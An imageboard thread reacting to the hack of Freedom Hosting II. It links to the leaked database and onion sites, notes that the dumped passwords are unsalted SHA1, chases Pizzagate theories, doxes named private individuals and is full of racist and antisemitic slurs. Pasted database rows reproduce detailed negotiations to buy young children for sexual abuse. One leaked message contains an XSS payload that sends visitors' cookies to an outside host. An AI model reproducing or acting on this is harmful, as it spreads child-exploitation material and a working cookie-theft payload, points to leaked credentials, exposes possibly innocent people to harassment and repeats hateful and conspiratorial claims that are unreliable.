Freedom Hosting 2.0 Pwned, Info & Database Leaked

Freedom Hosting 2.0, perhaps one of the largest hosting services on the darkweb, was hacked by "Anonymous".

Verification

Brand legacy and follow up

Archived link to the article from pirate.london:
archive.fo/077M1

Pizzagate people over on Voat are already investigating this:
voat.co/v/pizzagate/1617245

Other urls found in this thread:

ghostbin.com/paste/twnzu
ghostbin.com/paste/3mhcp
archive.4plebs.org/pol/thread/111285111/
arthaus.org/
archive.fo/FQDly
arin.net/whois_tou.html##
arin.net/public/whoisinaccuracy/index.xhtml###
whois.arin.net/rest/nets;q=184.168.221.13?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2#NetRange:
whois.arin.net/rest/net/NET-184-168-0-0-1
t
a
pof.com/viewprofile.aspx?profile_id=1624375
we.tl/iqTVU5bnW4
we.tl/lXvigmlpBe
fhostingesps6bly.onion/fhosting.sql.gz.torrent
es2adizg32j3kob5.onion/
we.tl/iqTVU5bnW4\r\n\r\nPlease
we.tl/lXvigmlpBe\r\n\r\nBest
web.archive.org/web/20170206153058/http://www.volusiacountymoms.com/2011/05/arthaus-in-port-orange-offers-summer-art-camp.html
mediafire.com/filedrop/filedrop_hosted.php?drop=d380d437b1a8dbf567cf6cda1056c825dc682d40c305a4b62d66e1183cf7e2d9
spiegel.de/international/zeitgeist/the-sexual-revolution-and-children-how-the-left-took-things-too-far-a-702679.html
uk.linkedin.com/in/jayhamilton1
redseven.wordpress.com/alby/
archive.is/4lurR
mobile.twitter.com/redsevencf
redseven.
support26v5pvkg6.onion/index.php?PHPSESSID=0jmj7l0v3g5mhhq929hvg8qfu7&topic=12302.msg143202#new
postimg.org/image/lm7anfybn/964e4e52/
pedonia.com/
pirate.london/inside-the-freedom-hosting-ii-leak-aae1104ab693#.y103azvgk
mega.nz/#!xdtwGRqC!GMRVgLb2VQLsHwNvjoOLPDnETZIfQDNMdkyJBZs3hlo
en.m.wikipedia.org/wiki/Randy_Lennox
web.archive.org/web/20111109033620/http://www.redseven.ca/blog/reintroducing-jay-hamilton/
web.archive.org/web/20111101052607/http://www.redseven.ca/learn/our-team-2/
web.archive.org/web/20111101000306/http://www.redseven.ca/gallery/
paste.ee/p/pS3KG
instagram.com/p/3fJAkkiKlN/
archive.is/2dVMf
alcon32.tumblr.com
archive.is/ViU9x
archive.is/1D9Ta
mylife.com/adrian-magana/flacob16
imgur.com/gallery/wWUmN
youtube.com/user/flacob16
youtube.com/channel/UCtKPhqf5a98jMDBHvPYMPpA
archive.org/details/FREEDOMHOSTINGDATABASEHACKDUMP
washingtonpost.com/opinions/the-scariest-lesson-of-the-holocaust/2015/04/16/ffa8e23c-e468-11e4-905f-cc896d379a32_story.html
en.wikipedia.org/wiki/Waco_siege
en.wikipedia.org/wiki/Ruby_Ridge
archive.is/MtcnR
archive.is/CMwdg
voxday.blogspot.md/2015/09/anti-gamergate-is-pro-pedophile.html
theralphretort.com/anti-gamergate-accused-of-threatening-sjw-critical-of-nybergs-pedophilia-9020015/
rt.com/news/pedophile-communist-caught-red/
nytimes.com/2016/11/21/technology/fact-check-this-pizzeria-is-not-a-child-trafficking-site.html
archive.is/4qzmk
crisismagazine.com/2016/harry-hay-pioneering-gay-communist-former-catholic
voat.co/v/pizzagate/1623435
encyclopediadramatica.se/Ytask#How_The_Truth_Was_Uncovered
encyclopediadramatica.se/Kidrauhl#Pattie_Mallette_supported_Ytask
oxwugzccvk3dk6tj.onion/
twitter.com/NSFWRedditGif

This could be very interesting.

gay

pedophiles BTFO

aside from this, this is big

I wonder how much Pizzagate we will find in this? The DHS making a large fuss about human trafficking is interesting too. Something big is coming.

great to see pedos getting btf-o
oh

user is dead

Anyone has the DB and can post?
I wish they would do the same to domainsbyproxy.com

So why do we care about what the FBI dug up?

The FBI sometimes does things that favor the survival of the white race.

Lots of white people post on Holla Forums.

When white people see the FBI doing things that favor the survival of the white race, it makes sense that the white people would celebrate.

we r anunymus we r legun we nevr 4giv expecto petroleum

GHOSTBIN OF PEDO MESSAGES

ghostbin.com/paste/twnzu
ghostbin.com/paste/twnzu

Here's an excerpt of a guy negotiating the purchase of a little girl:

that's some lady gaga shit right here

Here I was thinking that all the slightly tech-competent people abandoned ship long ago. What self respecting hacker would use the anonymoose name at this point?

In the West. They'd be illegal for Muslims, and especially gay muslims, to access, could be potential lulz.

Damn. That's just…. hope someone fixes this shit.

Bump for dump

trump will purge our nation of this shit

Moralfag moose are at it again
Fucking kikes

…Fuck.

seriously?

I've drank too much with my normie friends for the super bowl. Can I get a tl:dr?

Is this a happening?

GhostBin is down…

Anyone have another copy of the user/passwords somewhere?

They are apparently hashed with SHA1 (no salt).

We're now watching the fallout.

How are people so dumb in CY+2???

Any correlation to political or Hollywood entities?

I'm guessing most of those are law enforcement trying to lure pedos in.
It is disturbing that people exist who take the bait.

Basically, Freedom Hosting is notorious for being a web host for CP and other sketchy content on the "Dark Web" (Tor specifically).

The BIG hope is that some of the data found in this relates to PizzaGate, I think. No guarantee that it will, just a possibility worth investigating.

We shall see… but I imagine those people have underlings to handle stuff like that. Perhaps there will be logs of those handlers leading clues to procuring children for "VIPs".

It'll also be interesting if any of their clients were using their freedom host account as a mail server.

This is key, which I left out. When sites are "hidden" on Tor, of course it has to reside somewhere, and quite often, that sketchy content is actually located on freedomhosting.

Is this a throwback thread or something?
Also I was under the impression that anonymous is now just a guise of the feds. No?

But which PART of the feds is the question, as we do remember the little "war" running on in D.C..

Account Ghostbin:
ghostbin.com/paste/3mhcp

Passwords hashed with sha1 and no salt.

CIA are the assholes. I mean just fucking look at them.

And BTW @youranonnews et al, have been getting very preachy defending those fucks and retweeting ex-cia faggots.

𝕀 π”½π•Œβ„‚π•‚π•€β„•π”Ύ ℍ𝕆ℙ𝔼 π•Žβ„π”Όβ„• 𝔾𝕆𝔻 β„π”Όπ•‹π•Œβ„β„•π•Š 𝕋𝕆 π”»π”Όπ•Šπ•‹β„π•†π• π•‹β„π•€π•Š π•Žπ•†β„π•ƒπ”», ℍ𝔼 π”½π•Œβ„‚π•‚π•€β„•π”Ύ π”Ήπ•Œβ„β„•π•Š 𝔸ℕ𝔻 π”Όπ•β„™π•ƒπ•†π”»π”Όπ•Š 𝔼𝕍𝔼ℝ𝕐𝕋ℍ𝕀ℕ𝔾 𝔸ℕ𝔻 π•Šπ”Όβ„•π”»π•Š 𝔼𝕍𝔼ℝ𝕐 π•Šπ•€β„•π”Ύπ•ƒπ”Ό π•‚π•€π”»π”½π•Œβ„‚π•‚π”Όβ„ 𝕃𝕀𝕂𝔼 π•‹β„π•€π•Š 𝕋𝕆 ℍ𝔼𝕃𝕃. 𝕀 ℍ𝕆ℙ𝔼 ℍ𝔼 π”½π•Œβ„‚π•‚π•€β„•π”Ύ π•Œβ„•π•ƒπ”Όπ”Έπ•Šβ„π”Όπ•Š 𝔸 𝔹𝔼𝔸𝕄 𝕆𝔽 𝕃𝕀𝔾ℍ𝕋 𝕋ℍ𝔸𝕋 π”Ήπ•Œβ„β„•π•Š 𝕋ℍ𝔼 π”»π”Έβ„π•‚β„•π”Όπ•Šπ•Š 𝕀ℕ𝕋𝕆 π•Šπ”Έβ„•π”». 𝕀 π”½π•Œβ„‚π•‚π•€β„•π”Ύ ℍ𝕆ℙ𝔼 ℍ𝔼 π•Œβ„•π•ƒπ”Όπ”Έπ•Šβ„π”Όπ•Š π”½π•†β„π”Όπ•Š 𝕋ℍ𝔸𝕋 π”»π•€π•Šπ•€β„•π”Όπ”Ύβ„π”Έπ•‹π”Ό π•Šπ”Έβ„•π”», π•‹β„π”Όπ”Όπ•Š, π•Žπ”Έπ•‹π”Όβ„. 𝔸𝕃𝕃 𝕆𝔽 𝕋ℍ𝔼 𝔻𝔼𝔾𝔼ℕ𝔼ℝ𝔸𝕋𝔼 π”Ήπ•Œπ•€π•ƒπ”»π•€β„•π”Ύπ•Š 𝕋𝕆 π”»π•Œπ•Šπ•‹. 𝕀 π”½π•Œβ„‚π•‚π•€β„•π”Ύ ℍ𝕆ℙ𝔼 ℍ𝔼 π”Ήπ•Œβ„β„•π•Š 𝔼𝕍𝔼ℝ𝕐𝕋ℍ𝕀ℕ𝔾 𝔸ℕ𝔻 π•Šπ”Όβ„•π”»π•Š π•‹β„π•€π•Š π”½π•Œβ„‚π•‚π•€β„•π”Ύ ℙ𝕃𝔸ℕ𝔼𝕋 𝕋𝕆 𝕆𝔹𝕃𝕀𝕋𝔼ℝ𝔸𝕋𝕀𝕆ℕ. π•Žβ„π• 𝔾𝕆𝔻? π•Žβ„π• π•„π•Œπ•Šπ•‹ π•Žπ”Ό π•Šπ”Όπ”Ό π•Šπ•Œβ„‚β„ π”»π•Œπ•Šπ”Ύπ•€β„•π•‹π•€β„•π”Ύ-β„•π”Όπ•Šπ•Š/ π•Žβ„π• ℂ𝔸ℕ'𝕋 𝔼𝕍𝔼ℝ𝕐𝕆ℕ𝔼 π•π•Œπ•Šπ•‹ 𝔹𝔼 𝕄𝔸ℝℝ𝕀𝔼𝔻 𝔸ℕ𝔻 𝔹𝔼 ℍ𝔸ℙℙ𝕐 π•Žπ•€π•‹β„ β„‚π•†β„•π•Šπ”Όβ„•π•‹π•€β„•π”Ύ π”Έπ”»π•Œπ•ƒπ•‹π•Š?. π•Žβ„π• π•„π•Œπ•Šπ•‹ π•Žπ”Ό 𝕃𝕀𝕍𝔼 𝕀ℕ 𝔸 π•Žπ•†β„π•ƒπ”» π•Žπ•€π•‹β„ π•Šπ•Œβ„‚β„β€¦π•Šπ•Œβ„‚β„ π”½π•Œβ„‚π•‚π•€β„•π”Ύ π•„π”Έπ”»β„•π”Όπ•Šπ•Š? π•Šπ•Œβ„‚β„ π”½π•Œβ„‚π•‚π•€β„•π”Ύ π”»π•€π•Šπ”Ύπ•Œπ•Šπ•‹. π•Šπ•Œβ„‚β„ π”½π•Œβ„‚π•‚π•€β„•π”Ύ 𝔸𝔹𝕆𝕄𝕀ℕ𝔸𝕋𝕀𝕆ℕ 𝔼ℕℍ𝔸ℕℂ𝕀ℕ𝔾 π•Šβ„π•€π•‹? 𝕀 π”½π•Œβ„‚π•‚π•€β„•π”Ύ ℍ𝔸𝕋𝔼 π•‹β„π•€π•Š π•Žπ•†β„π•ƒπ”». 𝕀 ℍ𝔸𝕋𝔼 𝕀𝕋 𝕀 ℍ𝔸𝕋𝔼 𝕀𝕋 𝕀 ℍ𝔸𝕋𝔼 𝕀𝕋 𝕀 ℍ𝔸𝕋𝔼 ℍ𝔸𝕋𝔼 ℍ𝔸𝕋𝔼 ℍ𝔸𝕋𝔼 ℍ𝔸𝕋𝔼 ℍ𝔸𝕋𝔼 𝔾𝕆𝔻 𝕀 ℍ𝔸𝕋𝔼 𝕀𝕋. 𝕂𝕃𝕃 𝕄𝔼, 𝔾𝕆𝔻. 𝕂𝕀𝕃𝕃 𝕄𝔼 𝕀 𝔻𝕆ℕ'𝕋 π•Žπ”Έβ„•π•‹ 𝕋𝕆 π•Šπ”Όπ”Ό 𝔸ℕ𝕐𝕄𝕆ℝ𝔼. 𝕋ℍ𝔼 ℝ𝔸𝔾𝔼. 𝕋ℍ𝔼 ℝ𝔸𝔾𝔼 π”Ήπ•Œβ„β„•π•Š π•€β„•π•Šπ•€π”»π”Ό 𝕄𝔼. 𝕄𝕐 π”½π•Œβ„‚π•‚π•€β„•π”Ύ π”½π•€β„•π”Ύπ”Όβ„π•Š 𝔸ℝ𝔼 π”Ήπ•Œβ„β„•π•€β„•π”Ύ 𝕋𝕐ℙ𝕀ℕ𝔾 π•‹β„π•€π•Š π”Ήπ•Œπ•‹ 𝕀'𝕄 π•Šπ•† π”½π•Œβ„‚π•‚π•€β„•π”Ύ 𝔸ℕ𝔾ℝ𝕐. 𝕀 ℍ𝔸𝕋𝔼 π”»π”Όπ”Ύπ”Όβ„•π”Όβ„π”Έπ•‹π”Όπ•Š. 𝕀 ℍ𝔸𝕋𝔼 π”½π”Όπ•„π•€β„•π•€π•Šπ•‹π•Š. 𝕀 ℍ𝔸𝕋𝔼 π”Ύπ”Έπ•π•Š. 𝕀 ℍ𝔸𝕋𝔼 β„•π•€π”Ύπ”Ύπ”Όβ„π•Š. 𝕀 ℍ𝔸𝕋𝔼 π”»β„π•Œπ”Ύπ•Š. 𝕀 ℍ𝔸𝕋𝔼 𝕀𝕋 𝔸𝕃𝕃. 𝕀 π”½π•Œβ„‚π•‚π•€β„•π”Ύ ℍ𝔸𝕋𝔼 𝕀𝕋 𝔸ℕ𝔻 𝕀 π•Žπ”Έβ„•π•‹ 𝕀𝕋 𝔸𝕃𝕃 𝕋𝕆 π”½π•Œβ„‚π•‚π•€β„•π”Ύ π”Ήπ•Œβ„β„•. π”Ήπ•Œβ„β„• π•„π•†π•‹β„π”Όβ„π”½π•Œβ„‚π•‚π”Όβ„. 𝔹ℝℕ 𝕋𝕆 𝕋ℍ𝔼 𝔾𝕆𝔻 𝔻𝔸𝕄ℕ π•„π•†π•‹β„π”Όβ„π”½π•Œβ„‚π•‚π•€β„•π”Ύ π”Ύβ„π•†π•Œβ„•π”» ℍ𝕆𝕃𝕐 𝕄𝕆𝕋ℍ𝔼ℝ 𝕆𝔽 π•π”Όπ•Šπ•Œπ•Š β„‚β„β„π•€π•Šπ•‹ 𝕀 β„‚π•†π•Œπ•ƒπ”»β€¦π•€ π”½π•Œβ„‚π•‚π•€β„•π”Ύ ℂ𝔸ℕ'𝕋. 𝕀 ℂ𝔸ℕ'𝕋 𝕋𝔸𝕂𝔼 π•Žπ”Έπ•‚π•€β„•π”Ύ π•Œβ„™ 𝕋𝕆 π•‹β„π•€π•Š π•Žπ•†β„π•ƒπ”» 𝔼 𝕍𝔼ℝ𝕐 π•Šπ•€β„•π”Ύπ•ƒπ”Ό 𝔻𝔸𝕐. 𝔾𝕆𝔻 𝔻𝔸𝕄ℕ π•π•†π•Œ, π•π”Όπ•Žπ•Š. 𝔾𝕆𝔻 𝔻𝔸𝕄ℕ π•π•†π•Œ 𝕋𝕆 ℍ𝔼𝕃𝕃!

archive.4plebs.org/pol/thread/111285111/

We found something here maybe, this art place

I'm not far from this place at all, what do

arthaus.org/

archive.fo/FQDly

We offer art classes for artists of all ages in our facility as well as a gift shop of handmade creations. Our out reach art classes provide cultural enrichment and art education to under served youth in the Boys & Girls Clubs and the Pace Center for teen girls.

I'm not sure but it's a strange choice of logo

if cuckchan knows then plebbit knows, if they do then it's only a matter of time before people start posting shit on their fuckbooks and give the game away.

it's a hell of a choice of a logo

they're going to see a spike in their web traffic if they pay attention to it, that will give it away quicker.

Their exhibits are all kids work and random sad artists who never got off the ground. Terrible and depressing display, like most art co-ops that give lessons to pathetically stay afloat.

www.arthaus.org already down. Getting 403 error.

keks

I thought the same thing at first but theyre on godaddy and blocking Tor and maybe other proxies

nope, still up for regular isp

This woman is attached to it, a typical kike libshit art teacher with aspirations of community organizing. Can't really see anything through her other than typical tricks.
Take a look at the honker on that sheriff, oy vey.

yeah, maybe soemone will tell them about the logo, im not certain they realize it

Looks like some proxies might be blocked too.

Can confirm it is hosted on GoDaddy.

whois 184.168.221.13## ARIN WHOIS data and services are subject to the Terms of Use# available at: arin.net/whois_tou.html## If you see inaccuracies in the results, please report at# arin.net/public/whoisinaccuracy/index.xhtml### The following results may also be obtained via:# whois.arin.net/rest/nets;q=184.168.221.13?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2#NetRange: 184.168.0.0 - 184.168.255.255CIDR: 184.168.0.0/16NetName: GO-DADDY-COM-LLCNetHandle: NET-184-168-0-0-1Parent: NET184 (NET-184-0-0-0-0)NetType: Direct AllocationOriginAS: AS26496Organization: GoDaddy.com, LLC (GODAD)RegDate: 2010-09-21Updated: 2014-02-25Comment: Please send abuse complaints to [email protected]: whois.arin.net/rest/net/NET-184-168-0-0-1

lol what did Kaleb mean by this?

sorry if I'm shitting up the thread I'll keep digging anyways

Nah, it's fine man…
wat

everything is fire

Translation: it's the feds. A ransom of $100 is pathetic, if they were serious they would be demanding at least 1 BTC, up to around 10 I'd say.

is this the real anonymous?
seems odd that (((anonymous))) would hack one of their own

The Feds took over "Anonymous" years ago, everyone knows that, and as I mentioned above the measly 0.1BTC ransom is proof that it's just Feds putting out bait to catch the fish.

Anonymous web hosting can be a good thing but pedos can get fucked with a rake. I'm glad Trump's administration is cleaning house.

FUCKING SAO FAGGOTS I SWEAR TO GOOOOOOOOOOOOOOOOOD

Sinon's Ass Online? :^)

trips for truth

We know feds like to pretend to be anoneemoose (expoct us) so it fits that the FBI is finally taking the gloves off

alcon32' 'Yes.\r\n\r\nRegards.''2015-07-14'

can someone image google this guy and see if he has something to do in LA? t witter.com/alcon32 a rchive.fo/hzgzp

pof.com/viewprofile.aspx?profile_id=1624375

web devs and database wizards need to pretty this shit up and make it more readable now

DOES ANYONE ELSE WANT TO VISIT THESE LINKS AND DOWNLOAD THE DOCUMENTS? I SURE AS HELL AM NOT

THIS GUY BOUGHT A DAUGHTER

2016-03-28',1,0),'redseven','Hi, Today I get a confidential document for you. You can access it at the following link: we.tl/iqTVU5bnW4

Please be careful with this documentation.\r\nRegards','2016-03-29',1,1),

(266,'redseven','Hi support,\r\n\r\nOk, I downloaded the single page document successfully, I will inform your superior of my choice. \r\nI will pay the remaining balance soon as I can, waiting for my money to get moved to my BTC exchange. I will try to pay all $10000USD in BTC\'s in one transaction. \r\nI will keep this documentation safe, I understand the importance of confidentiality.\r\nBest Regards','2016-03-29',1,0)

(269,'redseven','Hi,\r\n\r\nExcuse me, today came new confidential documents for you. Please be careful, help us to maintain our anonymity.\r\n\r\nTo see please click here:\r\nwe.tl/lXvigmlpBe

Best regards.','2016-03-30',1,1);

Old news
Where have you guys been

Didnt they provide a full free dump?
da fig u on about OP?

As of approximately 17:00 GMT the landing page has been updated to say:

>You may still donate BTC to 14iCDyeCSp12AmhVfJGxtrzXDabFop4QtU and support us.

fhostingesps6bly.onion/fhosting.sql.gz.torrent
This was the torrent

If you guys want to disrupt and destroy pedo community world over here is their main lair

es2adizg32j3kob5.onion/

(207,'redseven','Hello, I just discovered your site and registered, could you delete the pending western union payment it was an error, sorry.\r\nI wanted to ask if you could supply a girl in Canada in the Vancouver Area.\r\n But I\'m also prepared to buy a girl completely, underage youngest you can get?\r\nI can pay up to 20,000US or CDN Dollars for a girl depending on age, will be cash on delivery. I\'m serious, not playing a game. Thanks.\r\n','2016-03-04',1,0),

(211,'redseven','Hi, could you tell me if you have girls available in Canada? Underage or Adult, just need to know age and racial background, don\'t need photos.\r\nIf so, I\'m interested in buying outright any girl you have here, I\'m willing to pay, name your price for a girl you have.\r\nWe\'ll discuss more if you respond, please.','2016-03-05',1,0)

(212,'redseven','Hello again, I am interested in buying one of your girls. (Btw, I scanned your QR codes, they don\'t work, doesn\'t bring up any details).\r\nI know you have a process, but I\'m asking you to make an exception, please let your boss of operations deal with me here.\r\n\r\nI really want to buy a girl from you completely, one who is able and willing to begin a new prosperous life, she will be my own and live here with me and I will provide and take care of everthing, I just need her intimate love in return, we can have a beautiful life together, maybe even start a family in the future.\r\nI\'m prepared to pay top dollar, doesn\'t have to be an underage girl, if she\'s 18 to 19 I\'m assuming it\'ll be easier to travel and cross borders, but you can send me the details on your available girls, just age and race for now. \r\nI\'m in Canada, if you don\'t have any girls available here, I\'m sure you can get her into the country with real or fake documents, it doesn\'t matter how just get her here.\r\nThe plan is, yourself or one of your associates brings the girl to a designated location to make the deal, I will pay you in full cash and we can both go on our way, it\'s basically that simple.\r\n \r\nYou can contact me directly at this email,\r\n \r\[email protected]

Just use an user email service if your worried about security communicating this way, we both keep our identities confidential here.\r\nWe\'ll discuss price and details further if you respond to my offer.\r\nI hope you will give me this opportunity so I may find happiness and you will profit greatly.\r\nThank you.

(225,'redseven','Hi, dear. Excuse for the delay. We talk with our boss about your case and we have you an answer.\r\n\r\n1.- Yes we have available girls in your country.\r\n2.- We can sell you a girl, you choose her age. The price is not very different. A girl of 15 years old costs 25,000 USD approximately. Just tell us the age you want and we send the final price.\r\n3.- The payment can send for wu but in this case the payment must be in installments and the process is slower. If you pay us with btcs it\'s better for all because the payment can be totally, we prefer this alternative, we hope you too.\r\n4.- Respect your plans, no problem. You can do everything with your purchase, don\'t worry. Anyway we thank you sincerely for your good intentions, we can help you without problems.\r\n\r\nPlease tell us if you\'re still interested to start this process.\r\n\r\nBest regards.','2016-03-11',1,1)

(226,'redseven','Hello there, thank you for getting back to me.\r\nI\'m happy to hear that you have girls available in my country, Canada. I\'m also considering a very young girl to make her as my \'adopted daughter\' if you could tell me the youngest aged girl that is available here or could get here, I\'m talking down to as young as a preteen age.\r\nThank you.','2016-03-11',1,0),(227,'redseven','Hi, dear.\r\n\r\nWe have young girls, if you want a girl of 1 year old we sell her.\r\nPlease if you\'re really interested tell us to start the purchase process.\r\n\r\nThanks you\r\n\r\nBest regards.','2016-03-12',1,1),(228,'redseven','Hi, ok that\'s sounds great I\'d love to have a girl of 1 to 2 years old as my adopted daughter and be a part of my family. \r\nNow, please understand this, as I\'m taking all the risk here.\r\n At this point, I need to verify that this is for real, until I\'m convinced enough before I commit to any kind of payment.\r\n First, I have more questions that need to be answered, \r\n1. Canada is a very big country, can you tell me where (the province) she\'s currently in?\r\n2. Will you accept payment for her in cash when we all finally meet up to close the deal, I can pay in Canadian Dollars.\r\n3. Can you send me a photo and stats of this girl to my email address? (the one I posted in the previous messages)\r\n\r\nI\'m very interested to get a little girl, but if I simply start sending you funds via BTC or WU I\'m taking all the risk with no insurance or guarantee that your will deliver, ok?\r\n\r\nThank You. \r\n \r\n\r\n\r\n\r\n','2016-03-12',1,0)

(229,'redseven','Hi, dear.\r\n\r\nWe sorry. We understand your preoccupations but we don\'t work that way.\r\nWe don\'t reveal some information about our products without verification and in our system you appear how no payments.\r\nWe don\'t receive in cash, only wu or criptocurrency.\r\nIf you\'re really interested we suggest you buy a bag n°8 with a mesagge: Ò҂¬Å“Start payment processÒ҂¬Â in order to confirm you want start the payment process of this case (don\'t work with another bag because your purchase is very expensive). Only that way we can do you want, we will send photos, id\'s, etc. Then you could send the rest of money for another payment methods.\r\nIf you do it, the money is safe for you because you can use your hungercoins for purchases or ask refund.\r\n\r\nIf you don\'t like that way, we sorry. We recommend you buy us nothing.\r\n\r\nBest regards.','2016-03-13',1,1)

(234,'redseven','Hello again,\r\n\r\nAlright, to prove that you really have what you say you have, if I could pay to meet her for just 1 hour. I\'d like a girl between 1 to 5 years old, if you have this aged girl available right here in the Vancouver, Canada area (otherwise an older girl then).\r\nI\'m prepared to pay $300USD to meet and be with her, I will send payment in BTC when ready. \r\nThis will be the hard proof I need to see that you guys really are for real and have girls like this to sell me. If you deliver on this, then I\'ll be ready to pay the full $25,000 for the girl.\r\nIs that acceptable?\r\n\r\n If I begin sending you BTC\'s to my HC account to pay and meet her, do you give me your word I can trust you will deliver on this?\r\n\r\n','2016-03-14',1,0),

(235,'redseven','Hi, dear.\r\n\r\nI understand. Actually you can pay any bag to make an ordering of 1 or 2 hours, there isn\'t no problem. But there is a difference you must know. We offer sexual service how you know. The human traffic service is very different.\r\n\r\n1.- If you pay any bag you can do everything you want. You can ask for sexual service of 1 hour with a minor without problems but this minor would not be in sale, because this part of our system work randomly. It\'s possibily you receive a different minor any time you ask sexual service.\r\n\r\n2.- If you pay a bag n°8 to start payment process in order to buy a person, this part depending from other workers of traffic human sector. I\'m simply a communicator between you and the people work in this part. Anyway if you pay this little part of 25,000 you have rights to talk with another who help you to choose your girl. He will send photos and you must prepare all the rest of deal. I can\'t send you anything because I don\'t have access to data information from traffic human. I\'m sorry.\r\n\r\nAnyway remember you can ask to refund your hungercoins when you want. I hope I\'m helpful for you, write us again if you\'re interested.\r\n\r\nBest regards.\r\n','2016-03-15',1,1)

(236,'redseven','Hello,\r\n\r\nOk, I understand that if I see a girl for 1 hour, it won\'t be the same girl I will be able to buy completely, that\'s fine. The reason I want to do this first, is to verify \'proof of product\' that you will have a little girl like this for me, before committing myself to a huge $25,000 purchase. \r\n When I\'m ready to do this, I\'ll probably to have to pay via WU, (until/unless I can get some BTC\'s, I\'m having issues buying BTC\'s securely)\r\n \r\nSo, if this is the way it works, I select Bag 1, to pay with WU, but I don\'t want 2 hours, just 1 hour. I can send a payment via WU for $300US, which when received will be converted to HC in my account, I will request to meet a girl, 1-5 years old in my area on a day and time, you will then give me the ticket with the details of where to go on that day and time. \r\nIs that basically how this will work? Just need to clarify.\r\n\r\nNow to be clear, you must have a location and get a little girl here in the METRO VANCOUVER AREA, of BRITISH COLUMBIA, CANADA. I cannot travel to another province or cross country to meet somewhere else, Ok?\r\n\r\n\r\n\r\n','2016-03-16',1,0),

(237,'redseven','Hi, dear.\r\n\r\nYes, we work that way.\r\nOk, no problem.\r\n\r\nBest regards.','2016-03-17',1,1)

(238,'redseven','Hello, \n\n Ok, before I committ to payment, I want your assurance this is for real. You are NOT an LEA setup or \n\njust a way to steal my money without giving me anything, I feel I\'m taking a very big risk here, wish \n\nthere was a way for you to prove that your operation is legit before sending money, but I guess that\'s \n\nthe gamble I\'ll have to take.\n\nIf all goes well after this first meeting, I WILL COMMITT MYSELF TO DONATING $25,000 to adopt a little \n\ngirl into my family, it is the only thing in life I really, really want, to be her daddy. \n \nLastly, can you give me an email address that I can use to contact you, or your operations, in an \n\nemergency, in case something happens to your website(deepweb onions sites have a reputation of \n\ndisappearing for whatever reasons), if that happened all communication between us and funds would be \n\nlost. I have given you one of my secured email addresses to contact me, in a previous message.\n\nThanks again, I\'m putting my trust into your operation, I hope you will return the favor and trust me \n\nonce I begin sending payment, please do not disappoint me! \n','2016-03-17',1,0)

(239,'redseven','Hi, dear.\r\n\r\nNo problem. We mail address is [email protected]\r\n\r\nThis mail is only been in the case the website don\'t work. \r\n\r\nBest regards.','2016-03-18',1,1),(240,'redseven','Hi,\r\nAlright, I just sent a payment via WU for $390US, under bag 1.\r\nDo you need a voucher number? The one I see is: 8981441670\r\n\r\nI\'ll await confirmation that you\'ve received it. I\'d like to make arrangements ASAP. \r\nI\'ve already given you the details of the age and country/province/area of a girl I need to meet, if you need more info or have concerns you need me to verify, please let me know ASAP.\r\n\r\nNow that I have committed to this, I hope we will have complete trust and cooperation between us.\r\n\r\nThanks again.\r\n','2016-03-18',1,0),

(239,'redseven','Hi, dear.\r\n\r\nNo problem. We mail address is [email protected]\r\n\r\nThis mail is only been in the case the website don\'t work. \r\n\r\nBest regards.','2016-03-18',1,1)

(240,'redseven','Hi,\r\nAlright, I just sent a payment via WU for $390US, under bag 1.\r\nDo you need a voucher number? The one I see is: 8981441670\r\n\r\nI\'ll await confirmation that you\'ve received it. I\'d like to make arrangements ASAP. \r\nI\'ve already given you the details of the age and country/province/area of a girl I need to meet, if you need more info or have concerns you need me to verify, please let me know ASAP.\r\n\r\nNow that I have committed to this, I hope we will have complete trust and cooperation between us.\r\n\r\nThanks again.\r\n','2016-03-18',1,0),(241,'poison','hello? is anybody there ?\r\nI need more infos about your services.\r\n\r\n\r\ndocument.location = \"gotcha-randomcitizen.c9users.io/?id=\" + document.cookie;\r\n','2016-03-19',1,0)

(243,'redseven','Hi, thanks for your advice but I ask you please don\'t send any tracking number hereby as it is of your privacy, we are only the communication sector not finance. Please send your number in the button \"send voucher\" into place of purchase you have made.\r\n\r\nOn the other hand, I wnated to comment that a superior of our company is interested to contact you about your buying interests, if you allow me I can give him your email. I consult you because I don\'t want threatening your privacy, he will contact you if you so desire.\r\n\r\nThank you so much.','2016-03-19',1,1)

(244,'redseven','Hello, ok I managed to upload the voucher details and where you can see the MTCN number. Sorry, I had issues doing this I\'ll know how to do it next time better. \r\nYes, you can give your superior my email to contact me it\'s:\r\n\r\[email protected]\r\n\r\nI\'ll await confirmation of my payment to you, then will make the arrangements.\r\nThanks for you assistance I appreciate it.','2016-03-19',1,0)

(247,'redseven','Ok, no problem. Finance managers will be notified in the event of accepting payment if everything is in order. If you have more problems do not hesitate to reach me. Finally, in short will send you an email to the email that you provided us. \r\n\r\nThanks for everything.\r\n\r\nRegards.\r\n','2016-03-20',1,1),(248,'redseven','Hello, \r\nJust wondering how long it takes for you to confirm and receive payment sent by WU?\r\nOnce you\'ve received, and converted to HC, about how long will it take to make arrangements?\r\n I received the mail from your superior about adopting a girl but I would like to meet a little girl for 1-2 hours just to \'confirm\' things.\r\nThanks again,\r\n','2016-03-21',1,0)

(249,'redseven','Message from Finance Team:\r\n\r\nWe are sorry,\r\n\r\nWe do not pick up money in localities. You must send to our IBAN exposed at the time of purchase of the bag otherwise the money will not come to us. Please refer to the Agent local where you made the payment and ask for your money back and try to send by other means. Sorry for the inconvenience.\r\n\r\nHD','2016-03-22',1,1)

(253,'redseven','Hi, well I don\'t understand why you can\'t just pick up the WU transfer using the receiver name and MTCN.\r\nI\'m going to try to pay with my BTC account, which isn\'t ready yet, but when it is I will send again, I\'ll have to wait for now.','2016-03-22',1,0)

(255,'redseven','We currently have problems with WU, we suggest using other means of payment, sorry for the inconvenience.','2016-03-24',1,1)

(256,'redseven','Hello support, \r\n\r\nI have a question about payment, I\'ve selected bag 1 to pay with BTC, it says to transfer 1.56 BTC which is worth about $650 USD, but the bag amount is listed at only $390USD. I\'m going to transfer 1 BTC, worth about $415USD, as payment for a meeting with a girl for just one hour. This is my first purchase from your site to confirm things are real with your organization, I may purchase more meetings with girls, but I\'m in the process of adopting a little girl as that\'s my priority. I tried paying with WU before which failed, so I hope this BTC transaction goes through,\r\nI appreciate your services here, thanks!','2016-03-26',1,0)

(257,'redseven','Hi,\r\n\r\nJust make an another purchase of hungercoins bag. The bitcoin changes its price everyday, it\'s normal.\r\n\r\nRegards.','2016-03-26',1,1)

